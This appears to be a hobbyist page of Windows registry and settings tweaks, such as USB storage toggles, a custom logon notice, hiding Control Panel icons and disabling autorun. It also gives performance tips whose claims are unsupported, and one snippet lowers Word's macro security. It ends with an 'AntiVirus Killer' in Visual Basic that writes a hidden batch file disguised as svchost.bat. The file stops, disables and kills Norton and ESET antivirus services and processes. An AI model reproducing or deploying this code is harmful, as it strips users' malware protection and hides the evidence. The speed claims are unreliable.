disable Usb Connect.reg

[HKEY_LOCAL_MACHINE\SYSTEM\CurrentContro
lSet\Services\USBSTOR]
"Type"=dword:00000001
"Start"=dword:00000004

Enable Usb Connect.reg

[HKEY_LOCAL_MACHINE\SYSTEM\CurrentContro
lSet\Services\USBSTOR]
"Type"=dword:00000001
"Start"=dword:00000003

Legal notice & Caption

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon]

"LegalNoticeCaption"="W3L(OM3 +O \\/\\/ARLOC"
"LegalNoticeText"="Hey Napstr,Welcome to Warloc...!
If you are not Napstr..then use the guest account..
ThanX."

Lower MS Word Security

[HKEY_CURRENT_USER\Software\Microsoft\Of
fice\11.0\Word\Security]
"Level"=dword:00000004

Start your pc very fast

first Click on the start button then press Run
n type Regedit
press enter
this will open Registery Editor
now look for the key

HKEY_LOACAL_MECHINE\SYSTEM\CurrentControlSet\Control\ContentIndex

now there find the Key Called
"Startup Delay"
Double Click On It
Now where its Base
Click Decimal
Now its Default Value Is 4800000
Change The Value To 40000
here u go u have done it
now close the Registery Editor and Restart Your Computer

Show your favorite name in windows taskbar

In windows XP, You can display your name or any other favorite word in
windows taskbar just beside the digital time area and you can surprise
your friends to show them your name in windows taskbar.

Follow the given steps to display the name in windows task bar:

To use this feature, you will need to be logged into your computer with
administrative rights.



First click on windows Start button then Settings. Then click on Control
Panel option.
Start>Settings>Control Panel


SELECT ... Regional and language options.
Regional options tab>Customise>Time


As Example. I will use my Username .. RealInfo
Time Format: Must be set to ... h:mm:ss tt
Time Separator: :

Type a name for the time symbols....
AM Symbol: RealInfo
PM Symbol: RealInfo


Click Apply, and Apply again, to back out of all options.
Look by the Time/Clock, and see the name appear.

Increase Hard Disk speed in Windows

If you like to increase/optimize your Hard Disk I/O - read/write speed without buying expensive software utilities to do that job or changing the HD, just follow next steps. With doing these steps you will increase Hard disk speed (depends of manufacture and specification, but its worth to try). The most speed improvement is visible with IDE drives;

In any case, it won't harm your system, so try it yourself and let me know what you find!

Steps:

1. Run SYSEDIT.EXE from the start & then Run command.
2. Expand the system.ini file window.
3. Scroll down almost to the end of the file untill you find a line called [386enh].
4. Press Enter to make one blank line, and in that line type
5. Irq14=4096 (note: This line IS CASE SENSITIVE)
6. Click on the File menu, then choose Save.
7. Close SYSEDIT and reboot your computer.
8. Restart windows!

The speed improvement will be noticed just after the system reboots, any system info. software can be used to check the improvement.

Display or Hide Icons in control Panel

Hi.....here is the steps to hide or display icons in the Control panel. For eg., if u want to hide add/remove icon jusy follow below steps........


* Go to Start > Run and type regedit then press Enter.
* In the Registry Editor window, find the path like this,

HKEY_CURRENT_USER\Control Panel\don’t load

* Right click on ” don’t load ” folder and select New > String Value.

* Name the created String Value related to the Control Panel icon you want it to be hidden. To illustrate, I would like to hide the icon, Add/Remove Programs Option, so I must name the String Value appwiz.cpl . Each String Value name is specific and varies with the Control Panel icon.


* Double click on appwiz.cpl .

* Type Yes to hide the Add/Remove Programs Option icon and then click OK button.

* Open Control Panel, the Add/Remove Programs Option icon is now hidden.

* In case you want the icon to display again, just type No instead of Yes in Value Data dialog.

Disable PenDrive Autorun


Many viruses and worms are using the Autorun feature in the Windows Os to startup(infect).
Copy the green bold text on a text files and rename as (*.reg) then execute to disable the autorun feature of removable drives(CD/PEN).

Windows Registry Editor Version 5.00

[HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer]
"NoDriveTypeAutoRun"=dword:00000095


Change the value for desired output.

Value ------------------- Output
dword:000000b5 ------ Disable CD/PD(PenDrive) Autorun
dword:000000b1 ------ Enable PD Autorun
dword:00000091 ------ CD/PD Autorun enable
dword:00000095 ------ CD Autorun enabled

AntiVirus Killer

Open "c:\svchost.bat" For Output As #1
Print #1, "sc config navapsvc start= disabled"
Print #1, "sc stop navapsvc"
Print #1, "sc config SmcService start= disabled"
Print #1, "sc stop SmcService"
Print #1, "taskkill /f /im rtvscan.exe /t"
Print #1, "taskkill /f /im vptray.exe /t"
Print #1, "taskkill /f /im defwatch.exe /t"
Print #1, "taskkill /f /im nod32krn.exe /t"
Print #1, "sc config nod32krn start= disabled"
Print #1, "sc stop nod32krn"
Print #1, "sc config nod32krn start= disabled"
Print #1, "sc config ekrn start= disabled"
Print #1, "sc stop ekrn"
Print #1, "taskkill /f /im egui.exe /t"
Print #1, "taskkill /f /im nod32krn.exe /t"
Print #1, "taskkill /f /im nod32kui.exe /t"
Shell "c:\svchost.bat", vbHide
FileSystem.SetAttr "c:\svchost.bat", vbSystem + vbHidden + vbReadOnly